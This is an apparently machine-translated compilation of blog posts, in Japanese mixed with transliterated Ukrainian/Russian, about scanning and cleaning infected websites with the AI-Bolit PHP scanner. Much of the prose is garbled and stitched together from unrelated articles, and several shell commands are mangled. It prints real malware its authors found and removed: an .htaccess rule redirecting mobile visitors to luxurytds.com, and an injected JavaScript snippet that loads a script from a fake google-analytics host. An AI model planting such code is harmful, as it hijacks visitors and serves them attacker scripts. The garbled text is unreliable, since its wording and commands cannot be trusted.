シェルphpウイルスWebスキャナー。 AI-Bolitは、ホスティング用の効率的なウイルススキャナーおよびその他の悪意のあるコードです。 AI-Bolitスキャナーの使用方法

ゴロフナ / 主な機能

AI-Bolit-効率的なウイルススキャナーおよびその他 コードホスティング用

よく聞かれますが、AI-Bolitスキャナーがユニークなのはなぜですか? デスクトップアンチウイルスを見つけるためにmaldet、clamav chiであるコードを検索するための他の同様のツールの欠点は何ですか? 急なお知らせ-PHPとPerlで書かれた不正なコードを簡単に検出できます。 なんで? 下記参照。

日中、ずさんなコード(ハッカーのWebシェル、バックドアなど)は、より洗練されて折りたたみ可能になります。 識別子と暗号化コードの難読化

どこでも、関数の暗黙のコールバックは、呼び出し可能な引数、ハンドラー "、および関数の間接的な呼び出し可能オブジェクトを持つ追加のメソッドに対して実行され始めました。

線形構造と固定識別子を持つshkidlivyスクリプトはますます少なくなっています。 コードはマスクされ、ヤコモガのミンリビッシュ「ポリモーフィック」が奪われています

abo navpak、zrobitiは、元のスクリプトと同様のことを可能な限り許します。

時々、ずさんなスクリプトを分析している間、「ずさんな」を明確に識別する修正フラグメントを見ることが不可能です。 署名の単純なデータベース(アンチウイルスデータベース)の背後にあるこのような見苦しいコードを知ることは不可能であることは明らかです。これは、ホスティングで最も重要なWebアンチウイルスとスキャナーで勝つためです。 にとって 効果的なジョーク現代の「shkidlivih」では、ウイルスパターンを表すより流暢な方法を使用する必要があり、場合によってはヒューリスティックを使用する必要があります。 shkіdlyコードAI-BOLITのスキャナーでのまったく同じpidhіdmizastosovuєmo。
通常のウイルスに基づく野生パターンの大規模なデータベースの選択、多数の感染サイトのスキャンに基づく追加のヒューリスティック分析の開発により、AI-Bolitスキャナーを最も効果的で活発なツールで開発することができました。管理者とWebディストリビューターの。

AI-Bolitの幅広い人気は、シンプルなインターフェースと非営利的な方法での言論の自由の可能性からも優位に立っています。 すべてのウェブマスターは、公式サイトhttp://revisium.com/ai/からAI-Bolitを完全に無料でダウンロードし、リソースを変換して、ハッカーシェル、バックドア、出入り口、ウイルス、spam-rozillachiv、添付メッセージ、その他のshkidlivihフラグメントと挿入物を明らかにすることができます。 。 スキャナーは、クライアントサイトをレビューおよび照合するために、Webスタジオ、ホスティング会社、インターネットエージェンシーなどの営利企業によっても積極的にレビューされています。 ホスティング業者はAI-Bolitをコントロールパネルに統合し、Webエクスプローラーはyogoを使用して間違ったコードを検索し、サイト監視のホストサービスを検索します。

以下では、Ai-Bolitスキャナーの機能のほんのわずかな類似点を示します。

  • ブラウザコンソールから起動
  • 3つのスキャンモード(「シンプル」、「エキスパート」、「パラノイド」)と2つのロボットモード(「エクスプレス」と「外部スキャン」)
  • ハッカーのphpおよびperlスクリプト(シェル、バックドア)、ウイルス挿入、ドア、スパム-rozilachiv、メッセージ販売用スクリプト、クローキングスクリプト、およびその他の種類のshkidlivihスクリプトを検索します。 パターンと通常のウイルスを検索し、ヒューリスティックを使用して潜在的にでこぼこのコードを指定する
  • 暗号化され、断片化された署名を検索します テキストブロックおよびhex/oct/decエンコーディング
  • poshuk 疑わしいファイル shkіdlivihスクリプトでスタックできる構造で
  • ファイルの添付ファイルを検索する
  • シンボリックメッセージを検索する
  • 検索エンジンやモバイルリダイレクトなどのコードを検索します。
スピーチの前に、RosPatentからの著者の証明書はAi-Bolitで持ち去られました。 また、スキャナーは、サードパーティのサイト、専門誌、会議、ウェビナーでも積極的に展示されています。

スクリプトの公式側

サイトを作成する歌う革は、サイト上でウイルスやトロイの木馬に固執します。 最初の問題は、プロジェクトがプッシュシステムまたはホスティング業者の負担(DDoS、スパムの場合)の形でペシミゼーションを蓄えている場合、現時点まで問題を一度に軽減することです。

Qiaの記事は、サイトのWindowsでマシンに1時間のすばらしいバックアップがある場合は、次にホットで書く必要があります。 ESET Smartまるでvvazhavvіrusnyakomのように、セキュリティラプトムが写真に吠え始めました。 サイト上の写真の助けを借りて、FilesManバックドアが浸水したことが判明しました。

Dira bulaは、スクリプトが書き換えによってサイトに写真をキャプチャできるようにしたため、ファイルを展開するだけで写真がキャプチャされるようになりました。 Vmіstはperevіryavsyazovsіmではありません。 したがって、作業する必要はありません;)サイトの結果は、何があっても利用できます phpファイル写真の視界の下で。 エール、ダークについてではなく..。

サイト上のすべてのファイルのウイルスとトロイの木馬の検証を担当した人物について調べてください。

オンラインでウイルスのサイトをチェックする

ウイルス内のサイトのオンラインでのあらゆる種類の翻訳は、このタイプの単語zovsimには適していません。 オンラインスキャナーはロボットの冗談のように振る舞い、すべてを順番に調べます 利用可能な側面サイト。 サイトの側面への移動は、サイトの他の側面からの要求の対象となります。 それぞれ 悪者として、サイトのどこにも送信されていない写真の追加の助けを求めてサイトへのバックドアを仕掛けますが、サイトを汚すことはできないので、ウイルスを横に吊るす方法、それから オンラインレビューウイルスのサイトは写真を知らず、ウイルスも知りません。

あなたが尋ねるNavischo、悪人はとても奪われていますか? バックドアを氾濫させて何もしないのはどうですか? Vidpovim-スパム用、ddosu用。 その他の重いアクティビティの場合は、サイトの側面には表示されません。

一言で言えば、ウイルスのサイトのオンラインレビューは完全な安心のために絶対にマルナです。

WordPressサイトでウイルスやトロイの木馬をチェックするためのプラグイン

WordPressには、アンチウイルスプラグインがあります。 それはワインと呼ばれています。 ウイルスからサイトをクリーンアップすることでFilesManの写真を知っているのは素晴らしい気分です。 Alevinmaє重要なnedolіk。 ワインを再チェックする最初の1時間はサーバーへのワイルドな接続を提供するため、すべてのファイルを並べ替えるだけです。 さらに、箱から出して再チェックすることは手作業でのみ行うことができます。 プラグインを使用してサイトの再検証を自動化することは不可能です。

ええと、WordPressを使うことは可能です、それは普遍的である必要があります。

最高のアンチウイルスでウェブサイトをチェックする

言われたように、より多くの問題があり、1時間のバックアップで最も強力なデスクトップアンチウイルスによってvipadkovoが明らかになりました。 サイト全体を乗っ取り、最高のアンチウイルスでチェックすることが可能です。 すべてが完全に実用的です。

  • まず、自動化が必要です。 Schob reverka bula in 自動モードそしてpіdbagsbuvreadysvіtのために。
  • 別の方法で、これらは彼らの肌の子供たちを突き刺したサイトは単に本物ではありません、

AI-Bolitをお試しください

Schosіzイントロ私は引き締めます。 すべての検索の結果、不思議が知られています スキンフリーアンチウイルスサイトのために。 Tseyアンチウイルスは、ヨガのさまざまなスキームで使用できます。 私はssh経由でvikoristavをyogoします。

Chiは共有ホスティングでyogovikoristovuvatiになることができます-わかりませんが、それは可能だと思います。 AI-Bolitはphpで記述されており、ブラウザから起動できます。 純粋に技術的に-単独で、それは共有で可能です。

重要! Aibolitはウイルスにとって良いサイトではありません-あなたのためのワイン vinsのファイルは安全ではないので、電話をかけてください。 そして、なぜあなたは彼らと自分で仕事をするのですか。 それには、愚かなボタンをクリックするだけで、トロイの木馬からサイトで迷子になることはありません。

sshからVDSでAI-Bolitを取得する方法

Aiboliteには、どのアンチウイルスを選択するための手順とマスタークラスがあります。 シーケンスは単純です:

  • ダウンロード
  • サーバーに解凍しました(/ root / aiから解凍しました)
  • sshコンソールからphp/root/ai/ai-bolit/ai-bolit.phpを実行します
  • サイトによると、再チェックには1年かかる場合があります。
  • 再検証のサブバッグの場合、ファイルはAI-BOLIT-REPORT-の呼び出しで生成されます<дата>-<время>.html

サウンドファイルに問題のあるファイルが表示されるため、悪臭があります。

サーバーに大きな関心

主な問題は、ウイルスのサイトの自動再検証に固執することです。これは、サーバーにアクセスしようとするコストです。 すべてのアンチウイルスが同時に実行され、使用可能なすべてのファイルを順番に並べ替えます。 Іaibolitここに責任はありません。 Vinはすべてのファイルを取得し、それらを順番に再検証します。 アイデアは遅く、時間がかかる場合がありますが、これは制作には適していません。

エール、aiboliteはクレイジーな能力を持っています(あなたの心のために、あなたは完全なサーバーまたはルートアクセス付きのVDSを持っています)。 aiboliteの再検証用のファイルのリストを作成してから、リストを作成できます。 Todi aibolitは、このリストを確認するだけです。

リストの作成については、サーバーを使用してリストを高速化できます。 私は次のbashスクリプトを持っています:

#bash /root/ai/run.sh#https://revisium.com/kb/ai-bolit-console-faq.html DOMAIN = "website" AI_PATH = "/ root / ai" NOW = $(date + " %F-%k-%M-%S ")#パスワードアクセスでパブリックフォルダを作成できますREPORT_PATH =" $ AI_PATH / reports / $ DOMAIN- $ NOW.html "SCAN_PATH =" / home / azzrael / web / $ DOMAIN / public_html / "SCAN_DAYS = 90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode = 1 --path = $ SCAN_PATH --report = $ REPORT_PATH#X日変更ファイルのみをスキャン#AI-BOLIT-DOUBLECHECK.phpは、aibolitの作成者によって--with-2checkにハードコーディングされています!!! find $ SCAN_PATH -type f -ctime-$ SCAN_DAYS> "$ AI_PATH / ai-bolit / AI-BOLIT-DOUBLECHECK.php" #find $ SCAN_PATH -type f -name "* .ph *" -ctime-$ SCAN_DAYS> " $ AI_PATH / ai-bolit / AI-BOLIT-DOUBLECHECK.php "#find $ SCAN_PATH -type f -ctime-$ SCAN_DAYS>" $ AI_PATH / ai-bolit / AI-BOLIT-DOUBLECHECK.php "#find $ SCAN_PATH -type f -name "* .ph *" -o -name "* .gif" -ctime-$ SCAN_DAYS> "$ AI_PATH / ai-bolit / AI-BOLIT-DOUBLECHECK.php" php "$ AI_PATH / ai-bolit / ai -bolit.php "--mode = 1 --report = $ REPORT_PATH --with-2check #history -c

#bash /root/ai/run.sh

#https://revisium.com/kb/ai-bolit-console-faq.html

DOMAIN="サイト"

AI_PATH = "/ root / ai"

NOW = $(date + "%F-%k-%M-%S")

#パスワードアクセスでパブリックフォルダを作成できます

REPORT_PATH = "$ AI_PATH / reports / $ DOMAIN-$ NOW.html"

SCAN_PATH = "/ home / azzrael / web / $ DOMAIN / public_html /"

SCAN_DAYS = 90

#php /home/admin/ai/ai-bolit/ai-bolit.php --mode = 1 --path = $ SCAN_PATH --report = $ REPORT_PATH

php "$ AI_PATH / ai-bolit / ai-bolit.php"--mode = 1 --report = $ REPORT_PATH --with-2check

#history -c

ここでは、findコマンドを使用して、残りのSCAN_DAYS用に作成されたすべてのファイルを選択し、それらをリストAI-BOLIT-DOUBLECHECK.phpから選択していることがわかります。 SCAN_DAYSは1日に等しくすることができます。 bash /root/ai/run.shを素敵なcronに入れると、チェックするファイルのリストがそれほど大きくない可能性があります。 それぞれ ローンの再確認は十分な時間ではなく、サーバーはそれほどビジーではありません。

あなたのサイトがウイルスに感染していないことを確認しますか? オンラインアンチウイルスでサイトをチェックしましたか? 忘れてください。オンラインのアンチウイルスは、巧妙なハッカーによってサイトに侵入されたウイルスを知ることはできません。

悪臭を放つことができる最大のことは、あなた自身が誤ってあなたのサイトにインストールしたshkidliスクリプトを指定することです。 そのため、ウイルスのサイトを再チェックする根本的な方法が必要です。そうすれば、単にトップを飛び越えるだけでなく、プロジェクトの途中を調べることができます。

有料で無料でサイトをウイルスに変換するにはどうすればよいですか?

この記事では、サイトをウイルスに変換する方法のデキルカについて説明します。

オンラインアンチウイルス-最も単純ですが、すべてのヘルプと最良の方法があります。

アンチウイルスAibolit-最良かつ最も便利な方法。

ウェブサイトのウイルス対策 Virusday -最良のオプション。

サイトに安全でないウイルスを持っている人について少し。

サイトが安全でないのはなぜですか?

理論のトリオの穂軸のエール 特別証明書-私を何度もラマリします。 サイトをウイルスに感染させる方法は? サイトにアクセスすると、攻撃者は次のステップを実行できます。

プロジェクトへのトラフィックの促進を開始します。
Zavantazhuyutサーバーおよび第三者に販売するためのベースデータ。
サイトの連絡先と支払いの詳細を変更し、特派員の個人情報を要求します。
サイトにスパムメッセージを送信してドアを配布します。
ウイルス、トロイの木馬、またはエクスプロイトをサイトの側面に渡し、それらに感染させること。
サーバーからスパムを消費します。
悪意のあるサイトへのアクセスを他の攻撃者に売り、低レベルの不正侵入を阻止します。

理解することが重要です: ウイルスのあるサイトは制裁の対象となる可能性があります poshukovyhシステムとvtratitiの位置。 私のホスティングはすでにハッカーによって何度も爆撃されており、新しいものを攻撃しています。 なぜわざわざ? 目標は平凡です。パスワードへのアクセスを奪うか、コードの激怒によってサイトにウイルスを注入します。

私はすでに2人の女の子が彼らのウェブサイトから彼らで溢れているのを見たと思います。 エールtsepіvbіdi、私のサイトがその後infіkovanіであったという事実に、そしてnavіtchіnパスワードはこれでほとんどありません。 そして、すべてが二度と起こらないという保証はありません。

Potim、アドレスを再入力すると、その番号のサイトと管理パネルに移動します。 なんて威勢のいいことか、わかりません。 このサイトでは、私の残りの部分、そのようなことはありません。 だから私はpid DDOS攻撃まだ入っていません…。

サイトを非難する最も簡単な方法は、すべてを入力して、スクリプトをサイトに再度インストールすることです。。 エールは、あなたが理解しているように、極端なうつ病にのみ入る必要があるなど、極端なザヒドです。 同じコードをテンプレートに縫い付けることはできますが、変更することはありません。 したがって、穂軸については、私たちのサイトがどのような感染症を持っているかを調べる必要がありますか? どのようにロビティ?

オンラインでサイトをウイルスに戻す?

オンラインでウイルスのサイトを再確認する-上記で書いたように、この方法が最も効果的でない場合は、新しい方法から始めることができます。 Є下品なサービス アンチウイルスアラーム .

サイトのアドレスを入力し、サービスがサイトのウイルスを再チェックするまでチェックします。 あなたがその欠点を知っているなら、あなたはそれを疑った、そしてあなたはそれを星の中で見ることができる。 ただし、オンラインアンチウイルスについて何も知らない場合は、もっと試して解決策を見つけてください。

スクリプトを使用してサイトをウイルスに変換するにはどうすればよいですか?

文字通り同じ日に、アンチウイルスAibolitを使用してすべてのサイトをチェックし、メインの感染サイトであることを明らかにしました。

ウイルス対策とは何ですか?その使用方法は?

このアンチウイルスは、小売業者のWebサイトから入手できます。 アイボリット 。 現時点では、Windows用のバージョンがありますが、以前はホスティングを介してそれを行うことができました。

サイトのウイルス対策は何でしょうか? 軸何:

-ジョークウイルス、ホスティングに関するshkidlivyおよびハッカースクリプト:署名とバグのあるパターンのシェル、不器用なヒューリスティックに基づくシェル-明らかなものすべて-アンチウイルスとスキャナーは知ることができません。
-ランダムなスクリプトtimthumb、fckeditor、uploadifyなどを冗談で言います。
--Shukatiはshkіdlіサイトの.htaccessにリダイレクトします。
-Shukatiコード 実行可能な交換、.phpファイルのsape / trustlink /linkfeed/…など
-出入り口のディレクトリとファイルを選択します。
-テンプレート上のShukatiの空のメッセージ(非表示のメッセージ)。
-ディレクトリを表示し、エントリを開きます。
-非難せずにcmsを使用してください(joomla、wordpress、drupal、dle、bitrix、phpbb、...)
—電子メールによるnadsilat呼び出し、またはファイルの保存。

インストールは簡単です。アーカイブを解凍し、ai-bolitフォルダーのai-bolit.php、.aignore、.aurlignoreファイルと、CMSのバージョンと一致するknown_filesフォルダーのファイルをサイトのフォルダーにアップロードします。 、私の場合はtse.aknown.wp_3_8Wordpress。 おそらく、ファイルに正しい権限を設定する必要があります。たとえば、755などです。

正しいホスティングを利用している場合は、ターミナルにアクセスして(Linuxを使用しているので、エミュレータは必要ありません)、SSH経由でホスティングに接続する必要があります。

Ssh LOGIN @ SERVER_ADDRESS

確かに、私は説明しません、あなたが正しい場所にいないなら、それはここで必要です 個々のpidkhid、コメントを書いて説明します。

接続後、サイトのあるフォルダに追加のcdコマンドを実行する必要があります。 次のコマンドを実行します。

php ai-bolit.php

スキャンが明確になれば、それは長い間それを拭くようなものであり、サイトを自由に見ることができます。 完了すると、特定の名前のファイルがサイトのあるフォルダーに表示されます AI-BOLIT-REPORT-07-04-2014_23-10-719945.html

ファイルを開き、それが何であるかを分析します。 たとえば、穂軸自体に次のように表示されます。

シェルスクリプトの署名が見つかりました。 shk_dlivyスクリプトのP_dozra: (12)

しかし、ウイルスは1つしかなく、証明書には記録の暗号化と同様のシールが貼られていたことが判明しました。

ここで始める最も簡単な方法は、きれいなWordPressを入手することです。そうでない場合は、そこに何がありますか。 オリジナルのように、すべてが同じであり、自慢する必要はありません。 そうでない場合は、shkidlivyコードを表示できます。 ダリ私は吠えました:

Podvіynerazshirennya、shkіdlivyスクリプトのコンテンツchipіdozraを暗号化します。 必要な追加分析:(14)

1つのプラグインのLayavsyaアンチウイルス-トップ10-当然のことながら、それが問題です。 また、他のnebezpeki bouleは、spratsovuvannyamを許します。

そのため、ヒューリスティック分析はワードプレスファイルに吠えましたが、私はオリジナルを見て、すべてが順調でした。

これらのファイルには、非表示のメッセージが配置されています。 実行可能なスパムの疑い:

これがUPボタンを作成するプラグインです。新しいBuloにメッセージが追加されました。

ここにいくつかのプラグインが必要な場合は、すべてが強力になる可能性があることに注意する必要があります。 Ale tsevirishuєtsyaエレメンタリー、インデックス形式のプラグインでフォルダーを閉じます。 Wordpressでは、robot.txtに行を入力してrobiteできます。 禁止:/ wp-content / plugins

肌タイプの場合、すべてがより個性的になるので、より具体的に書くことが重要です。 メタ統計は、方向性を与えるために大きくなります。

ここではすべてがうまくいくでしょう、彼女は一つのことを手に入れません-絶え間ない監視。 今日はウイルス対策ソフトウェアを起動することはなく、ハッカーは休日なしで作業します。 そして、ここで別の素晴らしいサービスが私たちを助けます。 サイトサイトサービスを再確認するにはどうすればよいですか?

ウイルスに関するサイトの自動再チェック

最近登場したサービス Virusday 、ウイルスの存在についてサイトを永続的に監視できます。 すべてがより親しみやすく機能的に見えるので、ウイルスの形でのサイトの活気はここで最高です:


それらにサイトを追加し、サイトのルートにアップロードされるphp同期ファイルを取得する必要があります。 次に、同期とサービスを実行して、サイトをウイルスに変換できます。

無料版あなたのサイトがあなたにとって大切であるため、環境の実現可能性、それからあなたは大金を払って安らかに眠ることができます-サービス自体がウイルスをシャットダウンし、すぐに喜ぶでしょう。

さて、軸、ウイルスが1つのサイトで検出されました。 このサイトは、公開された出版物のプロトコルをvirubavするまで、私のサーバーでの破壊行為の罪を犯しています。 問題が発生しましたが、ウイルスは失われました。

さて、感染を見てみましょう。 Nі、ここではそれらのブロではなく、サービスはそのような情報だけを見たので、費用なしでウイルスを見たくありません:

見つかった脅威:h.ExternalRedirect
WEBサーバー構成ファイルには、サイトをサードパーティのリソースにインテリジェントにまたはめちゃくちゃにリダイレクトする方法が記載されています。 見ることをお勧めします.

サイトで検出したウイルスを検出するにはどうすればよいですか? 手動で知りたい、または有料料金を購読するかもしれませんが、サイトのセキュリティ画面は非常に重要です。 私は、すべてのために、共有ホスティングからどのような感染をもたらしたかを知りたいのですが、今は 公式VPS 特に問題はありませんでした。 Otzhe、 Virusdayに登録する そしてあなたのサイトを接続します。

あなたがウイルスについてあなたのサイトをチェックしたいなら、あなたがもっと多くの方法を知っていて、そして気のためにそれをもっと早く見つけたいなら、誰もがそれらについて知っているでしょう。

昨日、私は良いレセプションを持っていませんでした-彼らは私のすべてのサイトに感染しました。 いいですね、私はコンピューターの前にいて、問題について言及したら。 どうしたの?

私のサイトの1つは、出会い系サイト、わいせつなサイト、穏やかなカズチに移行するためのラプトムになっています。 私のドメインにアクセスすると、スパマーサイト全体にリダイレクトされます。

状況がさらに悪化した場合、問題をすぐに解決しなければ、それを非難することができます。 そしてyakschotsetrivatime dovgo、そして ポークシステムあなたのサイトにフィルターをかけることができ、あなたはすべての位置を検索に入れるでしょう。

私はすでにそれらについて何かを書きましたが、 この特定のタイプに swidkoウイルスを知る必要がありました。 すぐにコードshkіdlivyを手動で開きます。

リダイレクトが反対側から行われたので、スクリプトがヘッダー(header.php)に挿入されたか、送信(footer.php)されたと思いました。 エールサードパーティのコードはありませんでした。

私はすぐにホスティングのサポートサービスに連絡しました:

-問題の解決に役立てるために、わいせつなリソースにリダイレクトされるようなサイトがあります。

私自身が推測したように、エールは私の悪臭を追い越しませんでした。 サイトのルートにある.htaccessファイルで、次のコードを示しました。

RewriteEngine On RewriteBase / RewriteCond%(HTTP_USER_AGENT)android | avantgo | bada / | blackberry | blazer | compal | elaine | fennec | hiptop | iemobile | ip(hone | od | pad)| iris | kindle | lge | mobile | midp | mmp | netfront | palm(os)?| phone | p(ixi | re)/ | plucker | packet | psp | series(4 | 6)0 | symbian | treo|up。 wafone | wap | windows(ce | phone)| xda | xiino RewriteCond%(HTTP_USER_AGENT))| ai(ko | rn)| al(av | ca | co)| amoi | an(ex | ny | yw)| aptu | ar(ch | go)| as(te | us)| attw | au(di | -m | r | s)| avan | be(ck | ll | nq)| )| c55 / | capi | ccwa | cdm- | cell | chtm | cldc | cmd- | co(mp | nd)| craw | da(it | ll | ng)| dbte | dc-s | devi | dica | dmob |(c | p)o | ds(12 | -d)| el(49 | ai)| em(l2 | ul)| er(ic | k0)| esl8 | ez(0 | os | wa | ze)| fetc | fly(-| _)| g1 u | g560 | gene | gf-5 | g-mo | go(.w | od)| gr(ad | un)| haie | hcit | hd-(m | p) | t)| hei- | hi(pt | ta)| hp(i | ip)| hs-c | ht(c(-| aw | tc)| i-(20 | go | ma)| i230 | iac( |-| /)| ibro | idea | ig01 | ikom | im1k | inno | ipaq | iris | ja(t | v)a | jbro | jemu | jigs | kddi | keji | kgt(| /)| klon | kpt | kwc- | kyo(c | k)| le(no | xi)| lg(g | /(k | l | u)| 50 | 54 |-)| libw | lynx | m1-w | m3ga | m50 / | ma(te | ui | xo)| mc(01 | 21 | ca)| m-cr | me(di | rc | ri)| mi(o8 | oa | ts)| mmef | mo(01 | 02 | bi | de | do | t(-| | o | v)| zz)| mt(50 | p1 | v)| mwbp | mywa | n10 | n20 | n30(0 | 2)| n50(0 | 2 | 5)| n7(0(0 | 1))| 10)| ne((c | m)-| on | tf | wf | wg | wt)| nok(6 | i)| nzph | a | d | t)| pdxg | pg(13 |-(| c))| phil | pire | pl(ay | uc)| pn-2 | po(ck | rt | se)| prox | piso | pt- g | qa-a | qc(07 | 12 | 21 | 32 | 60 |-| i-)| qtek | r380 | r600 | raks | rim9 | ro(ve | zo)| s55 / | sa(ge | ma | mm | ms | ny | va)| sc(01 | h- | oo | p-)| sdk / | se(c(-| 0 | 1)| 47 | mc | nd | ri)| sgh- | shar | sie(-| m)| sk-0 | sl(45 | id)| sm(al | ar | b3 | it | t5)| so(ft | ny)| sp(01 | h- | v- | v) | sy(01 | mb)| t2(18 | 50)| t6(00 | 10 | 18)| ta(gt | lk)| tcl- | tdg- | tel(i | m)| | to(pl | sh)| ts(70 | m- | m3 | m5)| tx-9 | up(.b | g1 | si)| utst | v400 | v750 | (40 | 5 | -v)| vm40 | voda | vulc | vx(52 | 53 | 60 | 61 | 70 | 80 | 81 | 83 | 85 | 98)| w3c(-|)| webc | whit | wi( g | nc | nw)| wmlb | wonu | x700 | yas- | your | zeto | zte-)RewriteRule ^ $ _http://luxurytds.com/go.php?sid = 1#BULLETPROOF .50.8 >>>>> >> SECURE .HTACCESS

ヨガを学ぶとすぐに、必要に応じてすべてがうまくいき始めました。 すべてのために、私は5分を得ました。 しかし、私の代わりのヤクビーは新しい初心者でした、そして私が数時間飲むことができた新しいもので、ヤクビー・ヴィンは自分で問題を知り始めました。

私自身、すべてのサイトが同様のランクに感染していることを明らかにしました。 私は問題を解決し、ホスティングサポートに書き込みました:

私のすべてのサイトが感染しました、そして、彼らはあなたのホスティング上のすべてに感染しました、それは人々に先んじることは厄介ではないでしょう。

ブラは何と言いましたか:

あなたのサイトのファイルだけが「感染」しました。 このようなランクでは、一部のサイトで一貫性がありません。たとえば、斜めのレコードのファイルを変更することになります。 あなたは冗談を言ってこれらの愚かさを捕まえるためにウェブ小売業者に行く必要があります。

それほど間違っていないかもしれません。 私のホスティング上の私のサイトが感染している場合、それは最初に行うことではありません。 すべてのウェブマスターが同じ問題を抱えているわけではありませんか? 私のホスティングには何がありますか?

これは最初のホスティングではなく、私がそのような問題を抱えた場所はどこにもありません。 schob変更ホスティングの前にもっとschilyayuをDedalі、例えば CEY。

私の他のサイトがスパムを広めているとテクニカルサポートが私に書いたので、私はこの問題を解決しませんでした。 結局、サードパーティのphpファイルを1つのプラグインのあるフォルダーにアップロードすると、スパムが送信されました。

ファイル全体を削除したところ、問題は解決しました。 私はすでにWordPressが同じWindows上にあるという明確な印象を持っています、そして scho cim robiti?

AI-BOLITスキャナーをモードで実行するときに利用できる最大の機能 コマンドライン。 SSHにアクセスでき、ホスティングによってプロセッサリソースが大幅に削減されないため、Windows / Unix / Mac OS Xの場合と同様に、ホスティングに直接アクセスすることもできます。

スキャナーを実行するには、PHP7.1以降のコンソールバージョンが必要であることに注意してください。 もっと 初期のバージョンそれらは公式にはサポートされていません。 逆行 現行版 php-vコマンド

AI-BOLITスキャナーのコマンドラインのパラメーターの調整

ヘルプを表示

php ai-bolit.php --help

php ai-bolit.php --skip = jpg、png、gif、jpeg、JPG、PNG、GIF、bmp、xml、zip、rar、css、avi、mov

1つの拡張機能のみをスキャンする

php ai-bolit.php --scan = php、php5、pht、phtml、pl、cgi、htaccess、suspected、tpl

fakhivtsyのセキュリティのために検疫ファイルを準備します。 アーカイブAI-QUARANTINE-XXXX.zipはパスワードで作成されます。

phpai-bolit.php--検疫

スキャナーを「パラノイド」モードで実行します(最も詳細なサウンドをキャプチャするために推奨されます)

php ai-bolit.php --mode = 2

php ai-bolit.php --mode = 1

1つの「pms.db」ファイルをランダムなコードに変換します

php ai-bolit.php-jpms.db

512Mbのメモリスペースからスキャナーを実行する

php ai-bolit.php --memory = 512M

最大ファイルサイズを900Kbに設定

php ai-bolit.php --size = 900K

Robitiは、スキャンの1時間あたりのファイル間で500ミリ秒を一時停止します(負担を軽減するため)

php ai-bolit.php --delay = 500

スキャンに関するメッセージを電子メールに送信する [メール保護]

php ai-bolit.php [メール保護]

ファイル/home/scanned/report_site1.htmlから呼び出しを作成します

php ai-bolit.php --report = / home / scanned / report_site1.html

/ home / s / site1 / public_html /ディレクトリをスキャンします(--report = file_htmlオプションが設定されていないため、このディレクトリにロックダウンリンクが作成されます)

php ai-bolit.php --path = / home / s / site1 / public_html /

スキャンの完了後のVikonatiコマンド。

php ai-bolit.php --cmd = "〜/ postprocess.sh"

site1.txt名のテキストビュー(プレーンテキスト)から名前を削除します

php ai-bolit.php-lsite1.txt

たとえば、dzvinkiを組み合わせることができます。

php ai-bolit.php --size = 300K --path = / home / s / site1 / public_html / --mode = 2 --scan = php、phtml、pht、php5、pl、cgi、suspected

AI-BOLITスキャナーウィキを他のUNIXコマンドと組み合わせると、たとえば、サイトをバッチスキャンできます。 以下では、いくつかのサイトの再検証のバット、斜めのレコードの真ん中に配置をガイドします。 たとえば、サイトが/ var / www / user1 / data / wwwディレクトリの中央でホストされている場合、スキャナーを起動するコマンドは次のようになります。

find / var / www / user1 / data / www -maxdepth 1 -type d -exec php ai-bolit.php --path =()--mode = 2 \;

--reportパラメータを追加することにより、スキャンに関する呼び出しがあるディレクトリを確認できます。

phpai-bolit.phpパラメータリスト...--eng

インターフェイスを英語に切り替えます。 Tseyパラメータやめに行けます。

他のサービスとの統合およびホスティングパネルへの統合

php ai-bolit.php --json_report = / path / file.json

json形式でサウンドを形成する

php ai-bolit.php --progress = / path / progress.json

jsonファイルの再確認ステータスを保存します。 このファイルには、json形式で最も構造化されたデータが含まれています。ストリーミング再検証ファイル、再検証されたファイルの数、再検証に残されたファイルの数、再検証のタイムスタンプ、スキャンが終了するまでの1時間。 このメカニズムをチェックできるので、パネルにプログレスバーとチェック中のファイルに関するデータを表示できます。 スキャンが完了すると、ファイルは自動的に削除されます。

php ai-bolit.php --handler = / path / hander.php

Zovnishniyobrobnikpodіy。 あなたは、スキャンの穂軸/完了/スキャンの進行/スキャンの許しにいくつかの良いデータを追加することができます。 サンプルファイルは、tools/handler.phpディレクトリのスキャナーアーカイブで表示できます。 たとえば、スキャンが完了した後、ファイルをスクランブルできます(メールで送信し、後でアーカイブにパックします)。

今日、私の前に、彼らはウイルスからオンラインストアをきれいにするのに助けを求めました。 あるスポークスマンのために一方的に来た Google広告 AdWords。 シートはファイルが何を持っているかを教えられました jquery.js登録された疑わしいコード

ブラウザを支援するために先に進み、ファイルへのパスを開きましたが、アバストアンチウイルスが反応しませんでした ダニファイル、私は視覚的にすでにshkidlivyコードを持っていたいのですが。 それから私はFileZillaの助けを借りてftpに行き、Notepad++の助けを借りてファイルを開こうとしました。 Іosここに私のアンチウイルスがファイルへのアクセスをブロックしています。

ウイルスのjsファイルをクリーンアップするために、たまたまAVASTを10分間オンにしてから、ファイルから行を削除しました。

同様の問題が発生した場合は、小さな1つまたは行に示されているような不快なコードを確認できます。

Varr = document.referrer; var c = document.cookie; r1 = 0; if((r.indexOf( "yandex")> 0)||(r.indexOf( "google")> 0)||(r.indexOf( "rambler")> 0)||(r.indexOf( " mail ")> 0))(document.cookie =" __ga1 = 1; Expires = Wed、1 Mar 2020 00:00:00; path = /; "; r1 = 1;)else(if(c.indexOf(" __ga1 ")==-1)(document.cookie =" __ga2 = 1; Expires = Wed、Mar 1 2020 00:00:00; path = /; ";))if(((c.indexOf(" __ ga1 " ))>-1)||(r1 == 1))&&(c.indexOf( "__ ga2")==-1))(document.write(unescape( "%3Cscript src =" http:// google-分析).com / urchin.js "type =" text / javascript "%3E%3C / script%3E");)

サイトのバックアップ。

たとえば、追加のユーティリティパテや、可能であればサイトのアーカイブへのアクセスをsshアクセスで提供してくれました。 攻撃的なコマンドでスピードアップするのにコンソールで十分なのは誰ですか?

tar-cf backup .tar / home / login / site / public_html


* / home / login / site/public_html-サイトのメインディレクトリへのパス

サイトをバックアップして機能しないことはできますが、それがどれほど重要であるかがわかりますか?

現在、ウイルスのサイトをチェックするための2つのオプションがあります

1.サイトの改訂 ヘルプphpさまざまなウイルスとphpシェルを検出するAi-Bolitスクリプト。

2.サイト全体をコンピューターに持っていき、それを追い払う アバストアンチウイルス、ただし、最初のオプションは大幅に短く、優れており、大幅に低くなっています。

ローカルコンピューターでサイトをクリーニングする

手の甲で、私は別の方法でしゃがみました。これについて、yogoについて説明します。 すべてのファイル(またはアーカイブ)がコンピューターにダウンロードされ、25,000のトロックが少なからずあったため、アバストをダウンロードして、shkidlivスクリプトで再検証するために、ファイルを含むフォルダーをサイトに入力しました。

